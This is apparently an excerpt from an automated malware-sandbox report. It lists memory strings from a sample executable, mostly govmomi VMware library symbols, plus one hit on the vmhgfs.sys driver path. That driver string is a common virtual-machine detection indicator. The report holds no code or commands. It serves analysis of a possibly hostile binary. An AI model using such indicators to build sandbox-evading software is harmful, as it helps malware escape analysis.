            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1124
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2456
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3787
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1125
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2455
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3786
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualParallelPortOption).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3789
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2458
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1126
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*MigrationHostErrorEvent).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostDigestVerificationSetting).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3788
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2457
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1127
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostRuntimeInfoNetStackInstanceRuntimeInfoState).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*IoFilterManagerSslTrust).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VmBeingRelocatedEvent).GetVmRelocateSpecEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.AlarmEmailCompletedEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3770
            Source: file.exe, 00000000.00000002.1511159649.000001DC8B8FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*StorageDrsCannotMoveVmInUserFolder).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.RetrieveSnapshotInfoRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualDiskSparseVer1BackingOption).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*NetIpRouteConfigInfoIpRoute).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1117
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2449
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1118
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2448
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3779
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1119
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.FindByDnsName
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*CannotChangeHaSettingsForFtSecondary).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*NoLicenseServerConfiguredFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3772
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2441
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3771
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2440
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1110
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1111
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2443
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3774
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1112
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2442
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3773
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmGuestRebootEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1113
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2445
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3776
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1114
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2444
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3775
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*NoPeerHostFound).GetHostPowerOpFailed
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1115
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2447
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3778
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1116
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2446
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3777
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*GuestFileInfo).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*ReplicationVmFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*HostPowerOperationType).Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VspanPortMoveFaultFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmDasUpdateErrorEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VAppPropertyFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*AlarmEmailCompletedEvent).GetEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DisallowedDiskModeChange).GetInvalidVmConfig
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/json.jsonError.Error
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*DeviceHotPlugNotSupported).GetVimFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.VmRenamedEvent
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1106
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2438
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3769
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3768
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2437
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1107
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidDasRestartPriorityForFtVmFault).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1108
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*SnapshotMoveToNonHomeNotSupportedFault).GetSnapshotCopyNotSupported
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: VmToolsUpgradeFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1109
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2439
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2430
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3761
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3760
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1100
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2432
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3763
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.SendTestNotification
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1101
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2431
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3762
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*LimitExceeded).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.DistributedVirtualSwitchNetworkResourceControlVersion.Values
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1102
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2434
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3765
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1103
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2433
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3764
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1104
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2436
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3767
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.1105
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2435
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3766
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*OvfElement).GetMethodFault
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*InvalidVmState).GetInvalidState
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.0000000001C1A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: *types.VMwareDvsIpfixCapability
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: type:.eq.github.com/vmware/govmomi/vim25/types.ReconnectHostRequestType
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2427
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3758
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2426
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3757
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2429
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2428
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3759
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VAppConfigSpec).GetVmConfigSpec
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*VirtualSerialPortThinPrintBackingInfo).GetDynamicData
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.(*WakeOnLanNotSupportedByVmotionNICFault).GetHostPowerOpFailed
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3750
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2421
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3752
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2420
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3751
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2423
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3754
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2422
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3753
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2425
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.3756
            Source: RXdQ_uc4E2f9zze8GHsJCP4V.exe, 0000000E.00000000.1799143723.00000000023CF000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: github.com/vmware/govmomi/vim25/types.init.2424
